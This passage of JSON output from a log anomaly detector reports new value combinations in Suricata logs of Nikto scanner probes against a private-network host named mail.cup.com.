"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46924, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":15431801437120,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 15431801437120, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80", "/parser/model/time": 1583349514.328985, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46926, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pw", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.329101, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":593912356536889,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46926, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":593912356536889,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 593912356536889, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80", "/parser/model/time": 1583349514.330544, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46928, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cobalt", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.330734, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":246780214773980,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46928, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":246780214773980,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 246780214773980, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80", "/parser/model/time": 1583349514.332241, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46930, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsfdeslo", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
